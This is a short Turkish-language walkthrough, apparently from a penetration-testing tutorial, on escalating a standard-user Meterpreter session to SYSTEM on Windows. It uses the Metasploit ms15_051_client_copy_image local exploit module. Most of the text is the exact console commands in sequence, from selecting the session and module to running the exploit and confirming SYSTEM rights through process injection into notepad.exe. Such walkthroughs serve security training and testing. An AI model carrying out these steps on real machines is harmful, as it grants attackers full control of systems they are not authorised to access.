Standart yetkilerle elde edilen Meterpreter bağlantısında yerel yönetici hakları isteyen bir takım işlemlerin yapılamadığı görülmektedir.
sessions
sessions -i 1
ps -s
getsystem
Mevcut durumda standart bir kullanıcı haklarına sahip olunduğu görülmektedir.
run post/windows/gather/win_privs
Standart kullanıcı yetkilerine sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ms15_051_client_copy_image istismar modülü seçilir.
search ms15_051_client_copy_image
use exploit/windows/local/ms15_051_client_copy_image
show options
Modüle, mevcut oturuma ait ID değeri verilir ve modül başlatılarak SYSTEM hakları elde edilir.
set SESSION 1
show options
Modül çalıştırıldığında SYSTEM hakları ile çalışan “notepad.exe” adlı yeni bir prosesin başlatıldığı ve bu prosese enjekte olunarak yeni bir oturumun açıldığı görülmektedir.
exploit
getuid
getpid
ps -s
Modül çalıştırıldıktan sonra SYSTEM yetkilerinin elde edildiği görülmektedir.
run post/windows/gather/win_privs
Not: İkinci Meterpreter bağlantısı için payload bilgileri değiştirilerek de erişim gerçekleştirilebilir.
background
show options